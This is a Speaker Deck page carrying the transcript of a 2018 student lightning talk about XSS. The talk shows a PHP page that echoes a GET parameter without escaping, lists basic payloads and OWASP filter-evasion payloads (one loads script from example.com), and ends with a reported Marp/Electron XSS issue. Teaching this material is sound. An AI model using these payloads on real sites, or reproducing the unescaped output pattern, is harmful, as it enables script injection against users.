Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
1.5k
3
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
イベントとリソース定義から作成した依存グラフを用いた連鎖障害の調査時間の短縮 / DPS-206
tomoyk
0
23
Query Prediction for Log Search for Distributed Tracing with External Monitoring Alerts
tomoyk
0
40
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
71
Reading HTTP Client Hints
tomoyk
0
150
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
270
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
390
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
480
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1.1k
検索性能に配慮した複製による分散ログ管理 / DPS-185
tomoyk
0
31
Other Decks in Technology
See All in Technology
Snowflakeと仲良くなる第一歩
coco_se
4
450
チームで進めるAI駆動アジャイル×ウォーターフォール
kumaiu
0
160
ルールやカスタム機能、どう活かす?ハンズオンで体感するIBM Bobの出力コントロール
muehara
1
150
人材育成分科会.pdf
_awache
3
170
AIネイティブな開発のサプライチェーンリスク対策 〜激動の開発現場でリスクに立ち向かう〜【ZennFes】
cscengineer
PRO
2
110
データサイエンスを価値につなげるプロジェクト設計 〜 DS一年目が現場で得た気づき 〜
ysd113
1
230
SONiCで構築・運用する生成AI向けパブリッククラウドネットワーク ~実装編~
sonic
0
150
白金鉱業Meetup_Vol.24_「AIエージェントは分けるほど良い」は本当か? / Is it true that “the more you divide AI agents, the better”?
brainpadpr
1
360
現地で盛り上がった WWDC26 Keynote
zozotech
PRO
1
230
Oracle AI Database@Azure:サービス概要のご紹介
oracle4engineer
PRO
6
2k
日本 Fintech 未来予測レポート 2027〜2028年(手動編集版)
8maki
0
2.2k
2026TECHFRESH畢業分享會 - Lightning Talk - E起 See See : 電商推薦讀心術? 數據說了算
line_developers_tw
PRO
0
950
Featured
See All Featured
A designer walks into a library…
pauljervisheath
211
24k
Designing for humans not robots
tammielis
254
26k
30 Presentation Tips
portentint
PRO
1
320
How People are Using Generative and Agentic AI to Supercharge Their Products, Projects, Services and Value Streams Today
helenjbeal
1
210
Evolving SEO for Evolving Search Engines
ryanjones
0
220
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
aleyda
1
2k
Jamie Indigo - Trashchat’s Guide to Black Boxes: Technical SEO Tactics for LLMs
techseoconnect
PRO
0
160
Building an army of robots
kneath
306
46k
Agile Leadership in an Agile Organization
kimpetersen
PRO
0
160
Why Mistakes Are the Best Teachers: Turning Failure into a Pathway for Growth
auna
0
160
Heart Work Chapter 1 - Part 1
lfama
PRO
7
36k
技術選定の審美眼(2025年版) / Understanding the Spiral of Technologies 2025 edition
twada
PRO
118
120k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
coco_se
kumaiu
muehara
_awache
cscengineer
ysd113
sonic
brainpadpr
zozotech
oracle4engineer
8maki
line_developers_tw
pauljervisheath
tammielis
portentint
.png){kind=avatar}
helenjbeal
ryanjones
aleyda
techseoconnect
kneath
kimpetersen
auna
lfama
twada
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
